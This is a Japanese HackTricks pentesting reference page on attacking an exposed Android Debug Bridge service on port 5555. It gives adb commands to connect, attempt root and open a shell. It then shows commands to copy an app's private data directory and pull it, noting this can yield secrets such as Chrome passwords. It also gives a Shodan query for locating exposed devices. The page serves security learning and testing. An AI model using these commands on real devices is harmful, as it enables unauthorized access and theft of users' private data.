HackTricks5555 - Android Debug Bridge
Reading time: 4 minutes
tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:
HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
基本情報
From the docs:
Android Debug Bridge (adb) は、デバイスと通信するための多目的なコマンドラインツールです。adbコマンドは、アプリのインストールやデバッグなど、さまざまなデバイスアクションを容易にし、Unixシェルへのアクセスを提供し、デバイス上でさまざまなコマンドを実行することができます。
デフォルトポート: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
接続
デバイスのポートでADBサービスが実行されているのを見つけ、それに接続できれば、システム内でシェルを取得できます:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
以下のページでさらにADBコマンドを確認してください:
アプリデータのダンプ
アプリケーションのデータを完全にダウンロードするには、次のようにします:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
このトリックを使用して、Chromeのパスワードのような機密情報を取得できます。この件に関する詳細は、提供された情報をこちらで確認してください。
Shodan
android debug bridge
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。